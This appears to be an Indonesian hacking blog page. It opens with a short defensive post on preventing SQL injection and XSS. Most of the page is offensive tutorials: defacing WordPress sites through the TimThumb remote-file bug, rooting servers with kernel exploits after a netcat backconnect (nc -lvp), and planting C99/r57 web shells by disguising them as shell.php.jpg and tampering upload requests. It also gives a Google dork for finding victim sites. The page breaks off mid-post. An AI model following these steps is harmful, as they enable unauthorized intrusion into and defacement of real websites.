Pevita

Mencegah Website dari serangan SQL Injection & XSS

<div style="text-align: left;">1 . Mencegah web dari SQL injection SQL Injection? Apa itu? Ya, beberapa dari kita para developer web sudah mendengar hal ini, bahkan seorang yang bukan developer web pun juga mengetahuinya. SQL Injection merupakan salah satu teknik serangan terhadap sebuah situs atau website. Serangan ini memanfaatkan kesalahan perintah SQL yang dikirimkan dari web ke database server untuk dieksekusi oleh databaseserver. </div><div style="text-align: left;"> </div><div style="text-align: left;"> </div><div style="text-align: left;"></div><div style="text-align: left;">Pada umumnya sintak SQL yang sering dipakai pada proses developing atau pembuatan sebuah situs iyalah sintak DML(Data Manipualtion Language) yakni INSERT, UPDATE dan DELETE. Pada umumnya sintak yang dikirim seperti ini </div><div style="text-align: left;"> </div><div style="text-align: left;"> <blockquote class="tr_bq"><pre class="prettyprint">select * from `tblBerita` where `id` = 10 10 didapat dari hasil parsing parameter url http://www.website.com/index.php?id=10</pre></blockquote><pre class="prettyprint"> </pre><pre class="prettyprint"> </pre></div><div style="text-align: left;">maka pada penulisan sintak php akan menjadi seperti ini</div><blockquote class="tr_bq"><div style="text-align: left;"> </div><div style="text-align: left;"> <pre class="prettyprint">$SQL="select * from `tblBerita` where `id` = '".$_GET['id']."'";</pre></div></blockquote><div style="text-align: left;">pada proses eksekusi normal sintak tersebut, database server akan memberikan balikan hasil sesuai yang parameter yang dikirimkan. Namun bila kita meracuni parameter yang dikirim melalu url dengan sebuah karakter khusus yaitu single quote ( ' ) seperti ini </div><div style="text-align: left;"> <blockquote class="tr_bq"><pre class="prettyprint">http://www.website.com/index.php?id=10'</pre></blockquote></div><div style="text-align: left;">maka SQL query tersebut tidak akan bisa di eksekusi dan database server akan memberikan balikan berupa pesan error seperti berikut</div><div style="text-align: left;"> <blockquote class="tr_bq"><pre class="prettyprint"> #1064 - You have an error in your SQL syntax; check the manual that corresponds </pre>to yourMySQL server version for the right syntax to use near ''' at line 1</blockquote></div><div style="text-align: left;">mengapa? karena SQL yang dikirimkan ke database adalah seperti ini </div><div style="text-align: left;"> </div><div style="text-align: left;"> <blockquote class="tr_bq"><pre class="prettyprint">select * from `tblBerita` where `id` ='10''</pre></blockquote></div><div style="text-align: left;">perhatikan setelah nilai 10 terdapat dua buah single quote. Hal ini lah yang menyebabkan error, dan hal ini lah yang mejadi celah sebuah situs dan dengan mudah di eksploitasi dengan metode SQL Injection. </div><div style="text-align: left;"> </div><div style="text-align: left;"></div><div style="text-align: left;">Nah, bagaimana kita mengatasi hal ini? Ya, caranya adalah dengan melakukan sanitasi pada data yang dikirimkan dari url. </div><div style="text-align: left;"> </div><div style="text-align: left;"></div><div style="text-align: left;">PHP sendiri telah menyediakan method khusus untuk menangani hal ini, yaitu mysql_real_escape atau mysql_real_escape_string. Namun kita juga bisa membuat sebuah method khusus untuk mengerjakan hal ini, yang penting tujuannya adalah untuk sanitasi data yang dikirimkan.</div><div style="text-align: left;"> </div><div style="text-align: left;"></div><div style="text-align: left;">Saat penggunakan method itu maka sintak pengiriman SQL Query ke database server akan menjadi seperti ini</div><div style="text-align: left;"> <blockquote class="tr_bq"><pre class="prettyprint">$SQL="select * from `tblBerita` where `id` = '".mysql_real_escape_string($_GET['id'])."'";</pre></blockquote></div><blockquote><div style="text-align: left;">dan querynya akan mejadi seperti ini bila ada penambahan single quote pada url</div><div style="text-align: left;"> <pre class="prettyprint">select * from `tblBerita` where `id`='10'\'</pre></div></blockquote><div style="text-align: left;">dengan demikian, database hanya akan membaca 1 singel quote didepan angka 10 dan 1 single quote dibelakang angka 10, sedangkan 1 karakter single quote tambahan dibelakang angka 10 akan terabaikan karena adanya karakter back slash ( \ ). </div><div style="text-align: left;"></div><div style="text-align: left;"> Demikianlah tutorial singkat dari saya mengenai Proteksi Website dari Serangan SQL Injection.</div><div style="text-align: left;"></div><div style="text-align: left;">regards </div><div style="text-align: left;"> </div><div style="text-align: left;">2 . Cara pencegahan SQL INJECTION 1) Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang. 2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation). 3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan. 4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan. 5) Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.</div><div style="text-align: left;"> </div><div style="text-align: left;"> </div><div style="text-align: left;">3 Cara Mengatasi Serangan XSS XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya. Dikutip dari <a href="http://id.wikipedia.org/wiki/XSS" rel="nofollow">Wikipedia</a> Disini saya hanya menerangkan tempat dimana XSS dapat dilakukan XSS yang paling banyak digunakan adalah jenis GET dan POST. Salah satu contoh yang akan dibahas adalah jenis GET. Lihat gambar dibawah ini : <img alt="image" src="http://i51.tinypic.com/r9euyh.png" /> Masukkan script alert sederhana ini pada URL yang mempunyai request GET</div><div class="geshi_syntax"><table><tbody><tr><td><div class="code"><pre class="php">http://localhost/Momonimo/search?search_key=<script>alert('XSS TRUE')</script></pre></div></td></tr></tbody></table></div> Jika halaman tersebut (yang mempunyai database) dapat melakukan XSS, maka akan tampil alert seperti gambar sebagai berikut : <img alt="image" src="http://i51.tinypic.com/290ud4z.png" /> Mengatasi XSS --------------------------------------------------- PHP sangat handal dalam melakukan konversi string dengan cepat. Tetapi jenis apa yang akan anda lakukan jika hal diatas terjadi? Saya melakukan survey terhadap teman-teman programmer. Tidak sedikit yang menjawab "Pakai saja htmlentities() atau strip_tags()" htmlentities() memang dapat melakukan konversi tag-tag HTML, tetapi bagaimana dengan Javascript? strip_tags() memang dapat melakukan konversi tag-tag HTML dan PHP dengan NULL byte, tetapi bagaimana dengan Javascript? Lalu apa yang harus dilakukan? Saya memakai filter_var() dengan tipe filter Sanitize Caranya sebagai berikut : <div class="geshi_syntax"><table><tbody><tr><td><div class="code"><pre class="php">filter_var($val, FILTER_SANITIZE_STRING);</pre></div></td></tr></tbody></table></div> Dan hasilnya adalah : <img alt="image" src="http://i55.tinypic.com/b4ux6v.png" /> Berikut adalah Fungsi untuk keseluruhannya : <div class="geshi_syntax"><table><tbody><tr><td><div class="code"><pre class="php">function xss_filter($val) { $val = htmlentities($val); $val = strip_tags($val); $val = filter_var($val, FILTER_SANITIZE_STRING);   return $val; }</pre></div></td></tr></tbody></table></div> Saya membuat Fungsi diatas (dengan menambahkan htmlentities dan strip_tags) agar XSS key yang digunakan dapat terbaca semua. Semata-mata hanya ingin membuat rasa penasaran para hacker

Mencegah Website dari serangan SQL Injection & XSS

1 . Mencegah web dari SQL injection SQL Injection ? Apa itu? Ya, beberapa dari kita para developer web sudah mendengar hal ini, bahkan seor...

Tutorial Deface Dengan TimThumb 1.14

PS 0 DEFACE, HACKING & CRACKING 8:23 PM

Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih tepatnya terdapat pada " theme / tema " suatu website ,,, Contoh : themes/optimizepress/timthumb.php < nah kalo ada bacaan seperti " <pre> </pre><pre>no image specified Query String : TimThumb version : 1.19 </pre><pre> </pre><pre>berarti vuln ;) ,, nah yang harus kamu ketahui lagi itu adalah TimThumb version . </pre><pre>Nah jadi target yang bisa kita exploitasi itu timthumb version 1.14 sampai dengan </pre><pre>1.32 ,, Udah ngerti kan ? :) kalo belum ngerti liat aja tutorialnya :) ,, Yuk TKP .. </pre><pre> </pre><pre>Alat dan Bahan : </pre><pre>1. Subdomain yang terintegrasi website berikut </pre><pre> : picasa.com</pre><pre> : blogger.com</pre><pre>  : flixr.com </pre><pre> </pre><pre>sebenarnya ada 5 tapi aku gk hafal U,u ,, contoh " flxr.com.namawebsitekamu.com/shell.php "</pre><pre>, Nah sebelumnya kamu musti upload dulu shell di subdomain kamu yang letaknya di directory</pre><pre>public_html / httpdocs / www / dan macam² .. </pre><pre>  </pre><pre>2. Otak dan pantang menyerah ;) .. </pre> <pre>Exploit : </pre><pre>1. Kali ini saya dah punya target sendiri ,, lihat gambar .. </pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAOZwzHQYDb1_yGFkR2yp4V7_wgM-oMSqjumBi_n8HuVZv_wzo1tgYHbenwNZICk-SdNSFly-AveMDoko0tv5QgE5JNoTW0WIQ3lJDE8pJv06lMzY2kEzoNNITkp27U9hG7MjBa9D7eQch/s1600/Screenshot_1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAOZwzHQYDb1_yGFkR2yp4V7_wgM-oMSqjumBi_n8HuVZv_wzo1tgYHbenwNZICk-SdNSFly-AveMDoko0tv5QgE5JNoTW0WIQ3lJDE8pJv06lMzY2kEzoNNITkp27U9hG7MjBa9D7eQch/s1600/Screenshot_1.png" width="320" /> </a></div><div class="separator" style="clear: both; text-align: left;">2. Nah kemudian kalian tambahkan subdomain kalian di ahkir url seperti ini " ?src=http://www.flixr.com.subdomainkamu.com/shell.php " < begitu mas ;) ,, kurang jelas ? lihat gambar .. </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsjSfgLE72H8_3DkULdIh14IjaFfwOHmns4epYr7mijlLRV8EUKXR8oXeXKompFkSopvrx3q0I73csWeZrVgN6krGbtl51eFRRxbR-xTxyQT0DyO0FRZ06csTvMBE6cFz1RkJT5LN9jj6l/s1600/Screenshot_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsjSfgLE72H8_3DkULdIh14IjaFfwOHmns4epYr7mijlLRV8EUKXR8oXeXKompFkSopvrx3q0I73csWeZrVgN6krGbtl51eFRRxbR-xTxyQT0DyO0FRZ06csTvMBE6cFz1RkJT5LN9jj6l/s1600/Screenshot_2.png" width="320" /></a></div>3. Tuh liat gambarnya kalo gitu dah " Game Over " namanya ;) .. tinggal buka shellnya aja kan di situ ada tulisan " Unable to open image :" kalo gitu skrng tinggal buka shellnya , caranya copy md5 yang tadi contoh : <pre>" /cache/c89de71219ef668b7642e43e04d5d4df.php " masih kurang jelas ? liat gambar ..</pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8OFCZ-12jmAxl6gHOLqyqDSd325JSeOJicp0TYEe3RiyJ_vTAF_uwRKYFzseh_HDkLmULchnjLms9i8fTbUYVryewywSoWMRe-_KU-0r2ACJ66LHV0pXES1fn_ver5zZlPInwmZZ63U6/s1600/Screenshot_3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjV8OFCZ-12jmAxl6gHOLqyqDSd325JSeOJicp0TYEe3RiyJ_vTAF_uwRKYFzseh_HDkLmULchnjLms9i8fTbUYVryewywSoWMRe-_KU-0r2ACJ66LHV0pXES1fn_ver5zZlPInwmZZ63U6/s1600/Screenshot_3.png" width="320" /></a></div>4. Nah skrng kita copas ke urlnya jadi " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php "  , lihat di bawah ,, <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1StmtUjCQKu4m3fiennhA7Bmp8LEvPj1lZJhL5A39PuQ-L8gttWVGQTAL0s-Y9pdBqudbd7orbN5egM0_I3oZQ2m5e69jVnz0Y_112Asy53yeTAX3yARA1hDa3Esqos3CIDly-x3AJGBJ/s1600/Screenshot_4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1StmtUjCQKu4m3fiennhA7Bmp8LEvPj1lZJhL5A39PuQ-L8gttWVGQTAL0s-Y9pdBqudbd7orbN5egM0_I3oZQ2m5e69jVnz0Y_112Asy53yeTAX3yARA1hDa3Esqos3CIDly-x3AJGBJ/s1600/Screenshot_4.png" width="320" /></a></div>5. Selesai deh :D ,,, nah itu kalo ane gk upload shell di subdomainnya tapi upload uploader aja jadi ky gitu ,, hehe sory yak uploadernya punya pak deb~X ,, Source : Extreme Crew

Tutorial Deface Dengan TimThumb 1.14

Okeh sebelum belajar exploit ini saya mau ngejelasin bahwa timthumb ini adalah suatu bug dimana terdapat di semua website wordpress , lebih...

Tutorial R00t Server

PS 0 DEFACE, HACKING & CRACKING 2:29 AM

Bahan - Bahan : - VPS - Putty For Windows - Web Yang Sudah Tertanam Shell - Exploit Kernel :D Langkah - Langkah : 1.Backconnect dulu untuk tutor backconnect bisa di tonton > <a href="http://www.java-cyber.org/2014/01/tutorial-backconnect-dengan-netcat-di.html">disini </a>< <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghGtCzxXq0edR9BWdIgbNVI7QLUoFavxdShKz1sW1J5KC6enoCB2UMcJ-elXDm5CahYU_HRhiTfT_-FGL1eL8_SEUyUc1Pk4qhh_4-OPXakp0WX6ji3RZtZZr9tsMkBhSaz1v7YOK-SR6-/s1600/Screenshot_1.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghGtCzxXq0edR9BWdIgbNVI7QLUoFavxdShKz1sW1J5KC6enoCB2UMcJ-elXDm5CahYU_HRhiTfT_-FGL1eL8_SEUyUc1Pk4qhh_4-OPXakp0WX6ji3RZtZZr9tsMkBhSaz1v7YOK-SR6-/s1600/Screenshot_1.png" width="400" /></a></div> 2.Setelah Di Backconnect Akan Keluar Kernelnya Lalu Kita Search google   ~> Exploit Kernel [kernel web] contoh :   ~> Exploit Kernel 2.6.32 <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP8KZ_v5KIn4Yeq4pZGgpY66q_ArPP0iAEr_RhZa34t5H9ppdtTIJZyZgS1AfBOKxEcfwbzid3TY8-EIKHZy1_Vf7DQH9wXYblSVefWRMBouFuqDO6QY-eiSF7XvSddH1XNeGtfqAtILxj/s1600/Screenshot_2.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP8KZ_v5KIn4Yeq4pZGgpY66q_ArPP0iAEr_RhZa34t5H9ppdtTIJZyZgS1AfBOKxEcfwbzid3TY8-EIKHZy1_Vf7DQH9wXYblSVefWRMBouFuqDO6QY-eiSF7XvSddH1XNeGtfqAtILxj/s1600/Screenshot_2.png" width="400" /></a></div> 3.Setelah Menemukan Upload Exploit Ke Web <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq8bdPoT7LwIQME7B0RtmB3f6M7jSWDg0Sy2bkw63t2xa2DgQL_MOP9aS8s6TGQwalkrMnZ4Je-G5uPJL_XdkyKs_e9WmDlVFYedFb5RudlLWS0oIIwH-UtxGPUzr5JfdPxMIWjS3jV8OZ/s1600/Screenshot_3.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq8bdPoT7LwIQME7B0RtmB3f6M7jSWDg0Sy2bkw63t2xa2DgQL_MOP9aS8s6TGQwalkrMnZ4Je-G5uPJL_XdkyKs_e9WmDlVFYedFb5RudlLWS0oIIwH-UtxGPUzr5JfdPxMIWjS3jV8OZ/s1600/Screenshot_3.png" width="400" /></a></div> 4.Kita Kembali Ke putty Lagi Ganti chmodnya menjadi 777 dengan cara :   ~> "chmod +x namafile"   ~> "chmod 777 namafile" <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMU2KvoHZqnomXql1ahB1aO7bVw8yiLCu0FPWH-XRtqjU19pFQ_Apb9nb4d4Ri3SmIRFb9igG-wAFvxfdNiXjShUzy3MXL_iNnIYVLf0a0ac0jo9pK5XuZgM0oFB0rvEh-3Zdn2RIqVYjB/s1600/Screenshot_4.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMU2KvoHZqnomXql1ahB1aO7bVw8yiLCu0FPWH-XRtqjU19pFQ_Apb9nb4d4Ri3SmIRFb9igG-wAFvxfdNiXjShUzy3MXL_iNnIYVLf0a0ac0jo9pK5XuZgM0oFB0rvEh-3Zdn2RIqVYjB/s1600/Screenshot_4.png" width="400" /></a></div> 5.Tinggal Kita Excute dengan cara "./namafile" Contoh "./xxx" <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRJ7oMuYhcMM8RKD25yTly26jo9ybNuD-Dy6QK5nqwSfxNb-YY4lfqj8JmvCxZsCnp3Sd-9oMlAL6G0LRHHkVUuCRpOUfLyVoG6gP3-YFO3954rCkd2ta98ypYIrXU6qw2CZzAY3LPt-Rz/s1600/Screenshot_5.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRJ7oMuYhcMM8RKD25yTly26jo9ybNuD-Dy6QK5nqwSfxNb-YY4lfqj8JmvCxZsCnp3Sd-9oMlAL6G0LRHHkVUuCRpOUfLyVoG6gP3-YFO3954rCkd2ta98ypYIrXU6qw2CZzAY3LPt-Rz/s1600/Screenshot_5.png" width="400" /></a></div> 6.Coba Ketik id Jika Keluar   ~> uid=0(root) gid=0(root) groups=0(root) Berarti Succes Jika Error Berarti Kernel Kurang        Pas :D <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lYdcgjhEzLTDTJA8qGRJl3JY_0hrzFHPhBfv1WEykDCp-RMwKKsP8Gdp2y5DwO8eujG2BfkxSvWFSPdVaaSW-YCTcVQbzpN_jnCzCOgtZ9gnIqrTOknQaQ4VaNjnDyuuC-xfaJ0qVJOp/s1600/Screenshot_6.png" style="background-color: white; margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lYdcgjhEzLTDTJA8qGRJl3JY_0hrzFHPhBfv1WEykDCp-RMwKKsP8Gdp2y5DwO8eujG2BfkxSvWFSPdVaaSW-YCTcVQbzpN_jnCzCOgtZ9gnIqrTOknQaQ4VaNjnDyuuC-xfaJ0qVJOp/s1600/Screenshot_6.png" width="400" /></a></div> <div class="separator" style="clear: both; text-align: left;"> </div> <div class="separator" style="clear: both; text-align: left;">Gak mudeng? langsung tonton videonya </div> <div class="separator" style="clear: both; text-align: left;">~> <a href="http://www.youtube.com/watch?v=1wjdlfgQNqw&feature=youtu.be">Klik Disini</a></div>

Tutorial R00t Server

Bahan - Bahan : - VPS - Putty For Windows - Web Yang Sudah Tertanam Shell - Exploit Kernel :D Langkah - Langkah : 1.Backconnect dulu untuk t...

tutorial Backconnect

PS 0 HACKING & CRACKING 2:32 AM

Backconnect Adalah Teknik Awal Untuk rooting Server Bahan-Bahan : -VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial ) -Putty (Download <a href="http://www.putty.org/">Disini </a>) -Shell Yang Sudah Tertanam Di Web Langkah-Langkah 1).Buka Putty Lalu Masukan IP VPS Kamu Trus Klik Open <div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixU57ppKHcl1nHvK6mT92ZK8kZ6LG0nWrZpeckwW7rAv6lsPLAYbqAoQYcHTyCKdjDWdbreEIa-gX52zF1cMba6F4bdHBob7JfJjXTLyk9i2aV1y09jJCTOhH7HLpy15DF7sGGiocbhwdc/s1600/Screenshot_2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="375" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixU57ppKHcl1nHvK6mT92ZK8kZ6LG0nWrZpeckwW7rAv6lsPLAYbqAoQYcHTyCKdjDWdbreEIa-gX52zF1cMba6F4bdHBob7JfJjXTLyk9i2aV1y09jJCTOhH7HLpy15DF7sGGiocbhwdc/s400/Screenshot_2.png" width="400" /> </a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">2).Lalu masukan User Dan Password VPS Kalo Succes Login Akan Seperti Ini </div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT0q5roa_BnwxeWswwpYa17dt7-o-XnEbfz-2YGIAxJq1hOJpMOwL5ky78AVVU9-QYcFICKE3t9XbYJGp-PKVT8z_ezHGpKP-wJAQuQQ7iIO9re-oZaLCs-Goj1RhckfSTLCG5deqykrSI/s1600/Screenshot_3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjT0q5roa_BnwxeWswwpYa17dt7-o-XnEbfz-2YGIAxJq1hOJpMOwL5ky78AVVU9-QYcFICKE3t9XbYJGp-PKVT8z_ezHGpKP-wJAQuQQ7iIO9re-oZaLCs-Goj1RhckfSTLCG5deqykrSI/s400/Screenshot_3.png" width="400" /> </a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">3).Sekarang Kita Masukaan Command nc -lvp [port] contoh ; nc -lvp 2802 Saya Sarankan Menggunakan port 443 Lalu Tekan Enter</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ4iZFQQfbBQwUspVWO0c9SVq03hhqqZFSZ6o2sJ7cdrAwNVaos6DSD6rSOop-qjNuvvm1PScn-9K_aabQSEhexYLIC1LKhInAtkCMQ_RHJgKq6aSe1Q3nHoesCB-SrtlJNSxQDlk8JpGR/s1600/Screenshot_4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJ4iZFQQfbBQwUspVWO0c9SVq03hhqqZFSZ6o2sJ7cdrAwNVaos6DSD6rSOop-qjNuvvm1PScn-9K_aabQSEhexYLIC1LKhInAtkCMQ_RHJgKq6aSe1Q3nHoesCB-SrtlJNSxQDlk8JpGR/s400/Screenshot_4.png" width="400" /> </a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">4).Lalu Kita Ke Shell Dan Masukan IP VPS Trus Port Lalu Klik Connect </div><div class="separator" style="clear: both; text-align: left;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIvtb21n3Sm1StpBPw3OePxNu1jmEeiuN1CP2m-kQnwtr_rKIUwBs80J0eH0JieLJENVor6ejRvyWaRPvyAH8w0UzqvWogYPIqN-17JR6S6zj6D9YLedtTbkrnYQ3xt8rD_ujNakcXVw3c/s1600/Screenshot_5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIvtb21n3Sm1StpBPw3OePxNu1jmEeiuN1CP2m-kQnwtr_rKIUwBs80J0eH0JieLJENVor6ejRvyWaRPvyAH8w0UzqvWogYPIqN-17JR6S6zj6D9YLedtTbkrnYQ3xt8rD_ujNakcXVw3c/s400/Screenshot_5.png" width="400" /> </a></div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;">5).Kalo Sudah Connect Akan Seperti Ini Sekarng Terserh Mau Di Apain</div><div class="separator" style="clear: both; text-align: left;"> </div><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3f36zZHMgmQhxpn-M0CQDRqUEqTUmpy4brPSAikNhk2ceSiule1TspW8b_zeTdSja8OxSpgZFFB9LMHyDqF-AtJ6uoRNDLseSIgxaHMNTAsMHAVxHl00oglpcidetoMnBvY1pcBRtelTr/s1600/Screenshot_6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3f36zZHMgmQhxpn-M0CQDRqUEqTUmpy4brPSAikNhk2ceSiule1TspW8b_zeTdSja8OxSpgZFFB9LMHyDqF-AtJ6uoRNDLseSIgxaHMNTAsMHAVxHl00oglpcidetoMnBvY1pcBRtelTr/s400/Screenshot_6.png" width="400" /></a></div>

tutorial Backconnect

Backconnect Adalah Teknik Awal Untuk rooting Server Bahan-Bahan : -VPS (Kalo Gk Punya Duit Bisa Cari Yang Trial ) -Putty (Download Disini ) ...

Cara Deface web iklan by -Mr.HaurgeulisX196-

PS 0 DEFACE, HACKING & CRACKING 6:56 PM

Alat yang di butuhkan hanyapake Live HTTP Headers download <a href="https://addons.mozilla.org/id/firefox/addon/live-http-headers/" target="_blank">DISINI</a>atau bisa pake <a href="https://addons.mozilla.org/id/firefox/addon/tamper-data/" target="_blank">DISINI</a>  Dork : intext:pasang iklan gratis ( use your brain :D ) siap kan shell lalu rename menjadi jpg contoh shell.php.jpg cari web lalu exploit / tambahkan /banner/pasang misal www.site.com/banner/pasang <div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-uWLnpZa_Oo8/U8B7tcfcQ8I/AAAAAAAAAOA/4BfndeoaY3w/s1600/step1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="http://4.bp.blogspot.com/-uWLnpZa_Oo8/U8B7tcfcQ8I/AAAAAAAAAOA/4BfndeoaY3w/s1600/step1.png" width="320" /></a></div> jika sudah ketemu masuk ke pasang iklan banner lalu isi data asala aja di kolom form upload kamu masukan shell kamu yang sudah di rename tadi submit iklan nya lalu nanti akan tampil menu tamper2 nah kamu tamper data nya cari nama shell.php.jpg lalu kamu rename kembali menjadi shell.php  <div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-tp4_rzJ0TPs/U8B8eeCEDzI/AAAAAAAAAOI/LFNJvld7--8/s1600/sa.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="http://2.bp.blogspot.com/-tp4_rzJ0TPs/U8B8eeCEDzI/AAAAAAAAAOI/LFNJvld7--8/s1600/sa.png" width="320" /></a></div> dan taraaaaaaaa shell kamu dah masuk ke web tersebut defaul nya ada di target.com/images/bnrs/(namashell).php tapi tergantung setelen web nya juga .. <div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-HeqWAEC6lDA/U8B_5P_o9bI/AAAAAAAAAOs/ydg1o_-sp1s/s1600/aa.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://1.bp.blogspot.com/-HeqWAEC6lDA/U8B_5P_o9bI/AAAAAAAAAOs/ydg1o_-sp1s/s1600/aa.png" width="320" /></a></div> Selanjutnya terserah anda mau di apain..   Sumber  :  -Mr.HaurgeulisX196-

Cara Deface web iklan by -Mr.HaurgeulisX196-

Alat yang di butuhkan hanya pake Live HTTP Headers download DISINI atau bisa pake DISINI Dork : intext:pasang iklan gratis ( use your...

Cara ( Upload file PHP ) dengan Tamper Data

PS 0 HACKING & CRACKING 2:36 AM

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit. 1. Siapkan dulu file shell.php seperti : <a href="http://pastebin.com/f29bc8494">C99Shell</a>, <a href="http://pastebin.com/f1c206471">r57</a>, atau lainya cari aja di google banyak <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /> 2. Rename dengan nama : shell.php.jpg 3. <a href="http://adf.ly/JW63V" target="_blank">Install add ons Tamper Data</a> dulu di browser mozilla kita, Download <a href="http://adf.ly/JW63V" target="_blank">disini</a> <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /> 4. Restart dan kita mulai upload 5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan <img alt="" class="aligncenter" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjtbfWtFyxdbyDA6Q6TeiJgn-5AyqvI7K5HN0XpRLZSyUzTxzUkyV9yOAuM24_VmBfj0FCnmeFxFuZnhYE8arcrM2Ztwnu6e8y9L-tgHjLo8ZUeWYbj2crUALRp_vXsQ19dI4vQB4Z8mQ/s1600/tamper.PNG" /> 6. Trus Uploads shell.php.jpg kita dan tamper <img alt=":D" class="wp-smiley" src="http://s0.wp.com/wp-includes/images/smilies/icon_biggrin.gif?m=1129645325g" /><img alt="" class="aligncenter" 